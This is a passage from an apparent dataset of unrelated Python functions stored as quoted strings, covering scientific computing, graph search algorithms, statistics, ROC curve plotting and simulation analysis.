sets[j] )\n if (set_ij in sets) and (set_ij not in sets_remove):\n sets_remove.append( set_ij )\n sets_u = cim.get_compl(sets, sets_remove)\n else:\n sets_u = sets\n return sets_u", "def _rootsFinder(self, fun, jac, bounds, npoints, method):\n if method == \"regular\":\n step = (bounds[1] - bounds[0]) / (npoints + 1)\n try:\n X0 = np.arange(bounds[0] + step, bounds[1], step)\n except:\n X0 = np.random.uniform(bounds[0], bounds[1], npoints)\n elif method == \"random\":\n X0 = np.random.uniform(bounds[0], bounds[1], npoints)\n\n def objFun(X, f, jac):\n g = 0\n j = np.zeros(X.shape)\n i = 0\n for x in X:\n fx = f(x)\n g = g + fx**2\n j[i] = 2 * fx * jac(x)\n i = i + 1\n return g, j\n\n opt = minimize(\n lambda X: objFun(X, fun, jac),\n X0,\n method=\"L-BFGS-B\",\n jac=True,\n bounds=[bounds] * len(X0),\n )\n\n X = opt.x\n np.round(X, decimals=5)\n return np.unique(X)", "def get_kpoints(self,ifwrite='yes'):\n a11 = float(self.lat[2].split()[0])\n a12 = float(self.lat[2].split()[1])\n a13 = float(self.lat[2].split()[2])\n a21 = float(self.lat[3].split()[0])\n a22 = float(self.lat[3].split()[1])\n a23 = float(self.lat[3].split()[2])\n a31 = float(self.lat[4].split()[0])\n a32 = float(self.lat[4].split()[1])\n a33 = float(self.lat[4].split()[2])\n \n x0 = [a11, a12, a13]\n x1 = [a21, a22, a23]\n x2 = [a31, a32, a33]\n \n self.natom = sum(list(map(int,self.lat[6].split())))\n # Number of atoms in POSCAR/CONTCAR\n \n l0 = np.linalg.norm(x0)\n l1 = np.linalg.norm(x1)\n l2 = np.linalg.norm(x2)\n\n self.cell_norm = [l0, l1, l2]\n \n N = (l0*l1*l2*self.kppra/self.natom)**(1.0/3.0)\n \n k0 = int(N/l0)\n k1 = int(N/l1)\n k2 = int(N/l2)\n\n klist = [k0,k1,k2]\n flag = 0\n kn = klist[:]\n\n if len(set(klist)) == 1:\n if (np.prod(np.array(kn))*self.natom) < self.kppra:\n kn = [v+1 for v in kn]\n elif len(set(klist)) == 3:\n while (np.prod(np.array(kn))*self.natom) < self.kppra and flag < 3:\n kn[klist.index(sorted(klist)[flag])] += 1\n flag += 1\n else:\n while (np.prod(np.array(kn))*self.natom) < self.kppra and flag < 2:\n tmp = sorted(set(klist))[flag]\n tmp_ind = []\n for i in range(3):\n if klist[i] == tmp:\n tmp_ind.append(i)\n kn = [kn[i]+1 if i in tmp_ind else kn[i] for i in range(3)]\n flag += 1\n\n self.kps = kn\n \n if 
(np.prod(np.array(kn))*self.natom) < self.kppra:\n print(\"===== WARNING =====\")\n print(\"K-points generate method may not be appropriate!\")\n print(\"Check source code!!!!\")\n print(\"===================\")\n exit()\n\n #if ifwrite == 'yes':\n # self.write_output()", "def test_for_grader():\n test_map1 = np.array([\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 0, 0, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 0, 0, 1, 0, 0, 0, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1]])\n x_spacing1 = 1\n y_spacing1 = 1\n start1 = np.array([[1.5], [1.5], [0]])\n goal1 = np.array([[7.5], [1], [0]])\n path1 = dijkstras(test_map1,x_spacing1,y_spacing1,start1,goal1)\n s = 0\n for i in range(len(path1)-1):\n s += np.sqrt((path1[i][0]-path1[i+1][0])**2 + (path1[i][1]-path1[i+1][1])**2)\n print(\"Path 1 length:\")\n print(s)\n\n\n test_map2 = np.array([\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1],\n [1, 1, 1, 1, 1, 1, 1, 1]])\n start2 = np.array([[0.4], [0.4], [1.5707963267948966]])\n goal2 = np.array([[0.4], [1.8], [-1.5707963267948966]])\n x_spacing2 = 0.2\n y_spacing2 = 0.2\n path2 = dijkstras(test_map2,x_spacing2,y_spacing2,start2,goal2)\n s = 0\n for i in range(len(path2)-1):\n s += np.sqrt((path2[i][0]-path2[i+1][0])**2 + (path2[i][1]-path2[i+1][1])**2)\n print(\"Path 2 length:\")\n print(s)", "def get_grid_mappings(weighed_sum,\n use_defaults=True,min_index_row_peaks =40):\n # Detect peaks\n col_peaks = indices_highest_peaks(weighed_sum, 0)\n row_peaks = indices_highest_peaks(weighed_sum, 1)\n \n # Map col_peaks to Hz values\n if len(col_peaks) == len(HZ):\n mapping_Hz = dict(zip(HZ,col_peaks)) \n \n # Map adjusted col_peaks to Hz values\n else:\n try: \n col_peaks =adjust_arr_peaks(weighed_sum,col_peaks,len(HZ),0)\n mapping_Hz = dict(zip(HZ,col_peaks)) \n \n # Map adjusted HZ values to default coordinates if need be\n if use_defaults:\n for i,key in enumerate(HZ):\n if mapping_Hz[key] > UPPER_LIMIT_HZ_COORD[i] or mapping_Hz[key] < LOWER_LIMIT_HZ_COORD[i]:\n mapping_Hz[key] = DEFAULT_HZ_COORD[i]\n except:\n if use_defaults:\n mapping_Hz = dict(zip(HZ,DEFAULT_HZ_COORD )) \n else: \n return np.nan,np.nan,np.nan,np.nan\n \n \n row_peaks = row_peaks[row_peaks > min_index_row_peaks]\n \n try:\n row_100 = row_peaks[0] #Should be around 30 for 100 km\n row_200 = row_peaks[1] #Should be around 30 for 100 km\n except:\n if use_defaults:\n row_100 = KM_DEFAULT_100\n row_200 = KM_DEFAULT_200 \n else: \n return np.nan,np.nan,np.nan,np.nan\n \n if use_defaults:\n if abs(row_100 - KM_DEFAULT_100) > abs(KM_DEFAULT_200 - KM_DEFAULT_100):\n row_100 = KM_DEFAULT_100\n if abs(row_200 - KM_DEFAULT_200) > abs(KM_DEFAULT_200 - KM_DEFAULT_100):\n row_200 = KM_DEFAULT_200 \n \n mapping_km = {100:row_100,200:row_200}\n\n return col_peaks,row_peaks,mapping_Hz, mapping_km", "def aStarSearch(problem, heuristic=nullHeuristic):\r\n\t\"*** YOUR CODE HERE ***\"\r\n\r\n\tfrontera=util.PriorityQueue()\r\n\testadoInicial= problem.getStartState()\r\n\tvisitados=[]\r\n\tnodo = []\r\n\tnodo.append(estadoInicial)\r\n\tnodo.append(0)\r\n\tnodo.append(heuristic(estadoInicial,problem))\r\n\tnodo.append([])\r\n\r\n\tfrontera.push(nodo, nodo[1]+nodo[2])\r\n\r\n\twhile 
not(frontera.isEmpty()):\r\n\r\n\t\tnodo = frontera.pop()\r\n\t\testado = nodo[0]\r\n\t\tcosto = nodo[1]\r\n\t\tv = nodo[2]\r\n\t\tcamino = nodo[3]\r\n\r\n\t\tif(problem.isGoalState(estado)):\r\n\t\t\tbreak\r\n\r\n\t\tsucesores=problem.getSuccessors(estado)\r\n\t\tfor sucesor in sucesores:\r\n\t\t\tif sucesor[0] not in visitados:\r\n\t\t\t\tnodoSuc = []\r\n\t\t\t\tnodoSuc.append(sucesor[0])\r\n\t\t\t\tnodoSuc.append(costo + sucesor[2])\r\n\t\t\t\tnodoSuc.append(heuristic(nodoSuc[0], problem))\r\n\t\t\t\tnodoSuc.append(camino + [sucesor[1]])\r\n\r\n\t\t\t\tfrontera.push(nodoSuc, nodoSuc[1]+nodo[2])\r\n\t\t\t\t#frontera.push((sucesor[0], camino + [sucesor[1]], costo + sucesor[2]))\r\n\t\t\t\tvisitados.append(sucesor[0])\r\n\tprint ('Cantidad de nodos en memoria: {}').format(len(frontera.heap))\r\n\treturn camino\r\n\r\n\t#util.raiseNotDefined()\r", "def solution(n, m, r, c, k) -> int:\n xs = []\n # Add all the non-zero room widths to xs\n last_column_wall = None\n for col in c:\n if last_column_wall is not None and col - last_column_wall - 1 > 0:\n xs.append(col - last_column_wall - 1)\n last_column_wall = col\n ys = []\n # Add all the non-zero room heights to ys\n last_row_wall = None\n for row in r:\n if last_row_wall is not None and row - last_row_wall - 1 > 0:\n ys.append(row - last_row_wall - 1)\n last_row_wall = row\n return aux(xs, ys, k)", "def draw_min_span_tree(self):\n\t\tself.graph.draw()\n\n\t\tmin_span_tree = self.kruskal_solve()\n\t\tmin_span_tree.draw()", "def kruskal_wallis(data):\r\n # record number of groups for comparison\r\n num_groups = len(data)\r\n x = hstack(data)\r\n # calculate searchsorted right and searchsroted left indices.\r\n ssl, ssr, sx = ssl_ssr_sx(x)\r\n # calculate H\r\n start = 0\r\n stop = 0\r\n tot = 0\r\n for group in data:\r\n stop += len(group)\r\n # To average the ranks for tied entries we compute leftmost rank of\r\n # value i, minus rightmost rank of value i (and divide by 2). Since\r\n # python indexes to 0, ssl ranks are 1 lower than they shoud be (i.e.\r\n # the smallest value has rank 0 instead of 1). The +1 below corrects for\r\n # this and .5 averages.\r\n ranks = (ssr[start:stop] + ssl[start:stop] + 1) * .5\r\n tot += (ranks.sum() ** 2) / float(len(group))\r\n start += len(group)\r\n n = len(x)\r\n a = 12. / (n * (n + 1))\r\n b = -3. 
* (n + 1)\r\n H = (a * tot + b)\r\n # correct for ties by calulating D\r\n D = tie_correction(sx)\r\n # Because of the way the chisqprob function in pycogent works, if it gets\r\n # H/D = 0/0 it will fail to exit the loop and hang indefintitely.\r\n if D == 0:\r\n return nan, nan\r\n else:\r\n # give chisqprob the kw statistic, degrees of freedom = (num groups -\r\n # 1)\r\n p_value = chisqprob(H / D, num_groups - 1)\r\n return H / D, p_value", "def camino_minimo_bfs(grafo, origen):\n visitados = set()\n padres = {}\n orden = {}\n cola = collections.deque()\n\n visitados.add(origen)\n padres[origen] = None\n orden[origen] = 0\n cola.append(origen)\n\n while cola:\n v = cola.popleft()\n for w in grafo.adyacentes(v):\n if w not in visitados:\n visitados.add(w)\n padres[w] = v\n orden[w] = orden[v] + 1\n cola.append(w)\n\n return orden ,padres", "def calculate_items(ret_o,snaps, min_neigh=4, cutoff=1.5, MAXnb=100,\n nbins=2000, nbinsq=50, Pe=10, rho_0=0.60,\n spatial_correlation_flag = True,\n cluster_flag = False, CG_flag = True):\n\n ts = len(snaps)\n \n for t1 in range(0,ts):\n\n snap1 = snaps[t1]\n print(t1,ts)\n # for each snapshot in the dump file data\n\n box=snap1['box']\n ref_coords = snap1['ucoords']\n mus = snap1['mus']\n\n # compute (normalized) mean polarisation\n polarisation = np.linalg.norm(np.mean(mus,axis=0))\n\n p6re = np.mean(snap1['c_psi6[1]'])\n p6im = np.mean(snap1['c_psi6[2]'])\n p6 = np.absolute(np.complex(p6re, p6im))\n\n mux = np.mean(snap1['mux'])\n mux2 = np.mean(np.array(snap1['mux'])**2)\n muy = np.mean(snap1['muy'])\n muy2 = np.mean(np.array(snap1['muy'])**2)\n \n theta_Ns = np.arctan2(snap1['muy'], snap1['mux'])\n theta = np.mean(theta_Ns)\n theta2 = np.mean(theta_Ns**2)\n \n nematic_Ns = (2.*np.cos(theta)**2 - 1.)\n nematic = np.mean(nematic_Ns)\n nematic2 = np.mean(nematic_Ns**2)\n \n # compute time averages\n ret_o['g_cnt'] = ret_o.get('g_cnt',0) + 1\n ret_o['sum_psi6'] = ret_o.get('sum_psi6',0) + p6\n ret_o['sum_psi62'] = ret_o.get('sum_psi62',0) + p6*p6\n ret_o['sum_psi6_re'] = ret_o.get('sum_psi6_re',0) + p6re\n ret_o['sum_psi6_im'] = ret_o.get('sum_psi6_im',0) + p6im\n ret_o['sum_mux'] = ret_o.get('sum_mux',0) + mux\n ret_o['sum_mux2'] = ret_o.get('sum_mux2',0) + mux2\n ret_o['sum_muy'] = ret_o.get('sum_muy',0) + muy\n ret_o['sum_muy2'] = ret_o.get('sum_muy2',0) + muy2\n\n \n ret_o['sum_theta'] = ret_o.get('sum_theta',0) + theta\n ret_o['sum_theta2'] = ret_o.get('sum_theta2',0) + theta2\n\n\n ret_o['sum_nematic'] = ret_o.get('sum_nematic',0) + nematic\n ret_o['sum_nematic2'] = ret_o.get('sum_nematic2',0) + nematic2\n ret_o['polarisation'] = ret_o.get('polarisation',0) + polarisation\n\n \n if spatial_correlation_flag:\n \n tmp_list = spatial_correlations(t1,snap1, ret_o,min_neigh=4,\n cutoff=1.5,MAXnb=100,nbins=2000,\n nbinsq=50,Pe=10, rho_0=0.60)\n\n # distance matrix between particle pairs\n ref_distance, ref_dis_x, ref_dis_y = tmp_list[:3]\n # number of neighbours for all particles\n ref_num_nb, ref_list_nb = tmp_list[3:5]\n \n # correlation functions and structure functions\n g, g6, g6re, g6im, sq = tmp_list[5:10]\n g_ori, g_dp, g_dp_tr, g_pr, s_pr = tmp_list[10:]\n\n\n # compute time averages\n\n g_mat = np.matrix(g)\n g6_mat = np.matrix(g6)\n g6re_mat = np.matrix(g6re)\n g6im_mat = np.matrix(g6im)\n sq_mat = np.array(sq)\n\n ret_o['sum_g'] = ret_o.get('sum_g',0*g_mat)+g_mat\n ret_o['sum_g6'] = ret_o.get('sum_g6',0*g6_mat)+g6_mat\n ret_o['sum_g6re'] = ret_o.get('sum_g6re',0*g6re_mat)+g6re_mat \n ret_o['sum_g6im'] = 
ret_o.get('sum_g6im',0*g6im_mat)+g6im_mat\n\n ret_o['sum_sq'] = ret_o.get('sum_sq',0*sq_mat)+sq_mat\n\n g_ori_mat = np.array(g_ori)\n g_dp_mat = np.array(g_dp)\n g_dp_tr_mat = np.array(g_dp_tr)\n g_pr_mat = np.array(g_pr)\n pij_rij_mat = s_pr\n\n\n ret_o['sum_g_ori'] = (ret_o.get('sum_g_ori',0*g_ori_mat)\n + g_ori_mat)\n ret_o['sum_g_dp'] = (ret_o.get('sum_g_dp',0*g_dp_mat)\n + g_dp_mat)\n ret_o['sum_g_dp_tr'] = (ret_o.get('sum_g_dp_tr',0*g_dp_tr_mat)\n +g_dp_tr_mat)\n ret_o['sum_g_pr'] = (ret_o.get('sum_g_pr',0*g_pr_mat)\n +g_pr_mat)\n ret_o['sum_pij_rij'] = (ret_o.get('sum_pij_rij',0*pij_rij_mat)\n + pij_rij_mat)\n\n\n\n \n if cluster_flag:\n\n tmp_list = cluster_momenta(t1,snap1,\n min_cluster_size=min_cluster_size,\n CG_flag=CG_flag)\n\n RMS_AngMom,RMS_AngMom2 = tmp_list[:2]\n RMS_LinMom,RMS_LinMom2,cluster_size = tmp_list[2:]\n\n\n # beginning of time averages\n\n ret_o['sum_RMS_AngMom'] = (ret_o.get('sum_RMS_AngMom',0)\n + RMS_AngMom)\n ret_o['sum_RMS_AngMom2'] = (ret_o.get('sum_RMS_AngMom2',0)\n + RMS_AngMom2)\n ret_o['sum_RMS_LinMom'] = (ret_o.get('sum_RMS_LinMom',0)\n + RMS_LinMom)\n ret_o['sum_RMS_LinMom2'] = (ret_o.get('sum_RMS_LinMom2',0)\n + RMS_LinMom2)\n ret_o['sum_cluster_size'] = (ret_o.get('sum_cluster_size',0)\n +cluster_size)\n\n\n return ret_o", "def get_rings(phar):\n\n if not isinstance(phar, Pharmacophore):\n raise TypeError(\"Expected Pharmacophore, got %s instead\" %\n type(phar).__name__)\n\n def dfs_backedge(p, n, to_check=None, visited=None, spanning_tree=None):\n\n cycles = []\n if visited is None:\n visited = []\n\n if to_check is None:\n to_check = set(range(p.numnodes))\n\n if spanning_tree is None:\n spanning_tree = {n: None}\n\n tmp = list(to_check)\n\n for v in tmp:\n if v in np.where(p.edges[n] > 0.0)[0]:\n if v not in visited:\n visited.append(v)\n to_check.remove(v)\n spanning_tree[v] = n\n cycles += dfs_backedge(p, v, to_check, visited,\n spanning_tree)\n elif spanning_tree[n] != v:\n w = n\n cycle = set([v])\n add = True\n while w != v:\n v = spanning_tree[v]\n cycle.add(v)\n if add:\n cycles.append(cycle)\n return cycles\n\n rings_members = set()\n for n in range(phar.numnodes):\n if \"R\" in phar.nodes[n][\"type\"]:\n rings_members.add(n)\n\n cycles = []\n while len(rings_members) > 0:\n node = rings_members.pop()\n cycles += dfs_backedge(phar, node, to_check=rings_members)\n\n # join fused ring systems\n to_del = []\n for i in range(len(cycles)):\n for j in range(i):\n if len(cycles[i] & cycles[j]) > 0:\n cycles[i] = (cycles[i] | cycles[j])\n to_del.append(j)\n\n for i in range(len(cycles)-1, -1, -1):\n if i in to_del:\n del cycles[i]\n else:\n cycles[i] = list(cycles[i])\n\n ring_nodes = []\n for i in range(len(cycles)):\n n = float(len(cycles[i]))\n ring_node = {\"label\": \"R\"+str(i), \"freq\": 0.0, \"type\": {}}\n\n for j in cycles[i]:\n ring_node[\"freq\"] += phar.nodes[j][\"freq\"]\n for t in phar.nodes[j][\"type\"]:\n if t not in ring_node[\"type\"]:\n ring_node[\"type\"][t] = phar.nodes[j][\"type\"][t]\n else:\n ring_node[\"type\"][t] += phar.nodes[j][\"type\"][t]\n\n ring_nodes.append(ring_node)\n\n return ring_nodes, cycles", "def kruskal_based_heuristic(graph, root, B):\n E = set()\n\n # Stage 1\n\n # sort edges by cost, then by delay, then by node\n L_e = sorted(graph._allEdges(), key=lambda x: ( x.cost, x.delay, (x.node - graph.noNodes)%graph.noNodes))\n\n # TODO ovo se mora modificirati\n C = UnionFind()\n C.insert_objects(graph.nodes)\n\n # inicijalizirati minimalno kasnjenje\n solution_found, d_min, sp_edges = Dijkstra(graph, 
root, lambda x: x.delay)\n if not solution_found:\n print 'Unable to find d_min for the graph. Graph is not connected?'\n return\n print 'minimum delay per node'\n for v in d_min:\n print v, ' : ', d_min[v]\n\n # init\n delta = dict()\n p = dict()\n delta_max = dict()\n v_C = dict()\n\n for v in graph.get_vertices():\n delta[v] = d_min[v]\n p[v] = v\n delta_max[v] = 0\n v_C[v] = v\n\n number_of_components = graph.noNodes\n while number_of_components > 1 and len(L_e) > 0:\n e = L_e.pop(0)\n print '->', e\n u = e.node\n v = e.to\n\n if e not in E and C.find(u) != C.find(v):\n D_u = B - (delta[u] + e.delay + delta_max[v])\n D_v = B - (delta[v] + e.delay + delta_max[u])\n if D_u >= 0 or D_v >= 0:\n if D_u >= D_v:\n #C_u_v = v_C[u]\n C_u_v = C.find(u)\n delta[v] = delta[u] + e.delay\n p[v] = u\n root_of_subtree = v\n else:\n #C_u_v = v_C[v]\n C_u_v = C.find(v)\n delta[u] = delta[v] + e.delay\n p[u] = v\n root_of_subtree = u\n\n tree = create_graph(graph, E)\n dfs = DFS(tree, root_of_subtree)\n for edge in dfs.pre_order_edges:\n delta[edge.to] = delta[edge.node] + edge.delay\n p[edge.to] = edge.node\n\n # merge components\n E.add(e)\n C.union_left(C_u_v, v_C[u]) # ovaj union je drugaciji od standardnog uniona\n C.union_left(C_u_v, v_C[v]) #\n number_of_components -= 1\n\n # TODO popraviti ovaj dio\n # update delta_max[w] for w in C_u_v\n tree = create_graph(graph, [x for x in E if C.find(x.node) == C_u_v and C.find(x.to) == C_u_v])\n search = LongestPath(tree, C_u_v, lambda x: x.delay)\n for x in search.lp:\n delta_max[x] = search.lp[x]\n\n # print all edges in current solution\n print '+ ', e\n # stage 1 finished\n print \"Edges in a tree after Stage 1:\"\n for e in E:\n print e\n\n print\n print \"********* Stage 2 *********\"\n print\n\n C_s = C.find(root)\n print 'C_s = ', C_s\n if number_of_components > 1:\n for i in graph.get_vertices():\n C_i = C.find(i)\n if C_i != C_s:\n print 'Node ', i, ' in component ', C_i, ' not connected to root. Subtree root =', v_C[C_i]\n path_to_C_i = get_path(sp_edges, root, v_C[C_i])\n path_to_C_i.reverse()\n\n print 'path from ', v_C[C_i] , ' to ', root, ' : '\n for edge in path_to_C_i:\n print edge\n\n # finds last u such that d_min[u] = delta[u]\n u = root\n for edge in path_to_C_i:\n if d_min[edge.to] == delta[edge.to]:\n u = edge.to\n else:\n break\n print 'u = ', u\n\n path_to_u = get_path(sp_edges, u, v_C[C_i])\n path_to_u.reverse()\n\n for edge in path_to_u:\n assert d_min[edge.node] < d_min[edge.to]\n print edge.node, edge.to, p[edge.to]\n if p[edge.to] != edge.to and p[edge.to] != edge.node:\n E.add(edge)\n print 'add edge ', edge\n edge_to_remove = graph.get_edge(p[edge.to], edge.to)\n print 'edge to remove ', edge_to_remove\n E.remove(edge_to_remove)\n # TODO treba li ovdje update delta[edge.to] i p[edge.to] ???\n if edge.to == v_C[C_i]:\n print '!!! 
mislim da i ovdje treba dodati edge u skup rjesenja'\n E.add(edge)\n print 'add edge ', edge\n p[edge.to] = edge.node\n print\n return E", "def CalculateRoc2(dataArray,prefix,readsize,uniquehits,mappedreads,filename):\r\n starttime= time.time()\r\n uniquehits = float(uniquehits)\r\n readsize = float(readsize)\r\n \r\n \r\n entries = len(dataArray)\r\n \r\n\r\n resultmatrix = np.arange(entries*2)\r\n resultmatrix = resultmatrix.reshape(2,entries)\r\n \r\n maxrq = max(x.rq for x in dataArray)\r\n maxnm = max(x.nm[0] for x in dataArray)\r\n maxGaps= max(x.gaps[0] for x in dataArray)\r\n maxMism= max(x.mism[0] for x in dataArray)\r\n \r\n \r\n minrq = min(x.rq for x in dataArray)\r\n minnm = min(x.nm[0] for x in dataArray)\r\n minmq= min(x.mq[0] for x in dataArray)\r\n minGaps= min(x.gaps[0] for x in dataArray) \r\n minMism= min(x.mism[0] for x in dataArray) \r\n \r\n \r\n # adjust stepsize for rq since the score behaves the other way\r\n quants = [1,2,3,4,5]\r\n tempa = maxrq-minrq\r\n stepsize = tempa/5\r\n \r\n rqQuants = [round(minrq+(i-1)*stepsize,3) for i in quants]\r\n rqQuants.reverse()\r\n rqQuants[-1] =0 # last entry is rounded bigger than the smallest in the dataset\r\n \r\n nmQuants = [i*maxnm/5 for i in quants]\r\n GapsQuants = [i*maxGaps/5 for i in quants]\r\n MismQuants = [i*maxMism/5 for i in quants]\r\n\r\n rocvector = []\r\n \r\n # i = NM,l = RQ, k = MQ\r\n for l in quants: # RQ\r\n for k in quants: # GAPS\r\n for j in quants: # MISMATCH\r\n temparray = [m for m in dataArray if m.gaps[0] <= GapsQuants[k-1] and m.mism[0] <= MismQuants[j-1] and m.rq >=rqQuants[l-1]]\r\n \r\n\r\n tempids = [m.id for m in temparray]\r\n uniquereads = {}\r\n for i in xrange(0,len(tempids)):\r\n uniquereads[tempids[i]] = \"\"\r\n\r\n mappedreads = len(uniquereads)\r\n \r\n \r\n \r\n templength = len(temparray)\r\n \r\n if templength == 0:\r\n continue\r\n else:\r\n tempTP = sum(x.mr[0] for x in temparray)\r\n tempFP =templength-tempTP\r\n F = round((float(mappedreads)/ readsize) ,3)\r\n sens = round((tempTP/ uniquehits) * F,3)\r\n if tempFP == 0:\r\n spec = 0\r\n else:\r\n spec = round((tempFP / uniquehits) * F,3) \r\n \r\n rocvector.append([rqQuants[l-1],GapsQuants[k-1],MismQuants[j-1],tempTP,tempFP,templength,sens,spec,F])\r\n \r\n #print (\"%d\\t%d\\t%d\\t\" % (templength,tempTP,tempFP))\r\n\r\n #0 = NM 4 = TP 7 = sens\r\n #1 = RQ 5 = FP 8 = 1-spec\r\n #2 = GAPS 6 = P 9 = F\r\n #append needed for last entry in AUC calculation\r\n rocvector.append([0,0,0,0,0,0,0,0,0]) \r\n nproc = np.array(rocvector)\r\n \r\n #write the sens and specificity values from nproc according to the enumeration in line 149. \r\n #specificity is in cell -2\r\n # sensitivity is in cell -3\r\n sens = [i[-3] for i in nproc]\r\n spez = [i[-2] for i in nproc]\r\n \r\n # adjust ROC curve. 
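(The padding below stretches the curve so it reaches 1-specificity = 1; otherwise the trapezoidal integration further down, AUC = sum_i (x[i+1]-x[i]) * (y[i]+y[i+1]) / 2, would stop short of the full [0, 1] range and underestimate the area.)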
It is necessary that it the 1-specificity ends in 1.\r\n # for the last record copy the predecessor in sens to it\r\n # and write 1 to specificity \r\n spez[-1] = 1\r\n sens[-1] = sens[-2]\r\n \r\n\r\n rocarray1 = np.array([sens,spez])\r\n rocarray1 = rocarray1.flatten('F')\r\n rocarray1= rocarray1.reshape((len(spez),2))\r\n \r\n rocarray = np.array([sens,spez])\r\n rocarray = rocarray.flatten('F')\r\n rocarray = rocarray.reshape((len(spez),2))\r\n rocarray = np.sort(rocarray.view('float,float'), order=['f0','f1'], axis=0).view(np.float)\r\n \r\n rocarrayCorrected = rocarray\r\n \r\n #print rocarrayCorrected\r\n # project points where...\r\n for m in range(len(rocarrayCorrected)-2,-1,-1):\r\n if (rocarrayCorrected[m,1] >= rocarrayCorrected[m+1,1]):\r\n rocarrayCorrected[m,1] = rocarrayCorrected[m+1,1]\r\n\r\n \r\n #print rocarrayCorrected \r\n plt.hold(True)\r\n plt.figure()\r\n plt.subplot(111)\r\n #plt.scatter(spez, sens, c='b', marker='o', facecolor='red')\r\n #plt.plot(rocarray[:,1], rocarray[:,0]\r\n plt.plot(rocarrayCorrected[:,1],rocarrayCorrected[:,0], marker='o', markersize=7,linestyle='--', color='r', label='projected')\r\n plt.plot(rocarray1[:,1], rocarray1[:,0], linestyle=\"None\",label='real',marker='.',color='g')\r\n plt.xlabel('1-specificity')\r\n plt.ylabel('sensitivity')\r\n plt.title(r'ROC:'+filename)\r\n plt.axis([-0.1,1.1,-0.1,1.1])\r\n plt.grid(True)\r\n plt.legend(loc='lower right')\r\n plt.tight_layout()\r\n plt.savefig(prefix + \"_ROC.pdf\",format='pdf')\r\n plt.clf \r\n \r\n \r\n AUC = trapezoidal_rule(rocarrayCorrected[:,1], rocarrayCorrected[:,0])\r\n \r\n fobj = open(prefix+\"_roctable.txt\",\"w\")\r\n fobj.write(\"RQ\\tGAPS\\tMM\\tPTP\\tFP\\tP\\tSn\\t1-Sp\\tF\\r\\n\")\r\n for i in xrange(0,len(rocvector),1):\r\n temp = [str(k) for k in rocvector[i]]\r\n tempstr = \"\\t\".join(temp)\r\n fobj.write(tempstr+\"\\r\\n\")\r\n\r\n endtime= time.time()\r\n return(round(AUC,3))", "def test_kkrflex(self, kkrhost_local_code):\n from aiida.orm import load_node, Dict, Bool\n from masci_tools.io.kkr_params import kkrparams\n from aiida_kkr.calculations.kkr import KkrCalculation\n\n # load necessary files from db_dump files\n import_with_migration('files/db_dump_kkrcalc.tar.gz')\n\n # first load parent voronoi calculation\n kkr_calc = load_node('3058bd6c-de0b-400e-aff5-2331a5f5d566')\n\n # extract KKR parameter (add KKRFLEX option)\n params_node = kkr_calc.inputs.parameters\n params = params_node.get_dict()\n params['RUNOPT'] = ['KKRFLEX']\n params_node = Dict(params)\n\n # create an impurity_info node\n imp_info = Dict({'Rcut': 1.01, 'ilayer_center': 0, 'Zimp': [29.]})\n\n options = {'resources': {'num_machines': 1, 'tot_num_mpiprocs': 1}, 'queue_name': queuename}\n builder = KkrCalculation.get_builder()\n builder.code = kkrhost_local_code\n builder.metadata.options = options\n builder.parameters = params_node\n builder.parent_folder = kkr_calc.outputs.remote_folder\n builder.impurity_info = imp_info\n builder.retrieve_kkrflex = Bool(False)\n builder.metadata.dry_run = dry_run\n out = run(builder)\n print(out)", "def localMin(eccMap, binSize):\r\n\r\n eccMap2 = np.array(eccMap)\r\n cutStep = np.arange(np.nanmin(eccMap2[:]) - binSize,\r\n np.nanmax(eccMap2[:]) + binSize * 2,\r\n binSize)\r\n NumOfMin = 0\r\n i = 0\r\n while (NumOfMin <= 1) and (i < len(cutStep)):\r\n currThr = cutStep[i]\r\n marker = np.zeros(eccMap.shape, dtype=np.int)\r\n marker[eccMap2 <= (currThr)] = 1\r\n marker, NumOfMin = ni.measurements.label(marker)\r\n i = i + 1\r\n\r\n # if NumOfMin == 1:\r\n # 
print 'Only one local minimum was found!!!'\r\n # elif NumOfMin == 0:\r\n # print 'No local minimum was found!!!'\r\n # else:\r\n # print str(NumOfMin) + ' local minima were found!!!'\r\n #\r\n # if NumOfMin > 1:\r\n # plt.figure()\r\n # plt.imshow(marker,vmin=np.amin(marker), vmax=np.amax(marker),cmap='jet',interpolation='nearest')\r\n # plt.colorbar()\r\n # plt.title('marker from local min')\r\n\r\n return marker", "def calcfZmin(self, sInds, Obs, TL, TK, mode, hashname, koMap=None, koTimes=None):\r\n\r\n # Generate cache Name\r\n cachefname = hashname + \"fZmin\"\r\n\r\n # Check if file exists\r\n if os.path.isfile(cachefname): # check if file exists\r\n self.vprint(\"Loading cached fZmins from %s\" % cachefname)\r\n with open(cachefname, \"rb\") as f: # load from cache\r\n tmp1 = pickle.load(f)\r\n fZmins = tmp1[\"fZmins\"]\r\n fZtypes = tmp1[\"fZtypes\"]\r\n return fZmins, fZtypes\r\n else:\r\n tmpAssert = np.any(self.fZMap[mode[\"syst\"][\"name\"]])\r\n assert tmpAssert, \"fZMap does not exist for the mode of interest\"\r\n\r\n tmpfZ = np.asarray(self.fZMap[mode[\"syst\"][\"name\"]])\r\n fZ_matrix = tmpfZ[sInds, :] # Apply previous filters to fZMap\r\n # When are stars in KO regions\r\n # if this is being calculated without a koMap\r\n if koMap is None:\r\n koTimes = self.fZTimes\r\n\r\n # calculating keepout angles and keepout values for 1 system in mode\r\n koStr = list(\r\n filter(\r\n lambda syst: syst.startswith(\"koAngles_\"), mode[\"syst\"].keys()\r\n )\r\n )\r\n koangles = np.asarray([mode[\"syst\"][k] for k in koStr]).reshape(1, 4, 2)\r\n kogoodStart = Obs.keepout(TL, sInds, koTimes[0], koangles)[0].T\r\n nn = len(sInds)\r\n mm = len(koTimes)\r\n else:\r\n # getting the correct koTimes to look up in koMap\r\n assert (\r\n koTimes is not None\r\n ), 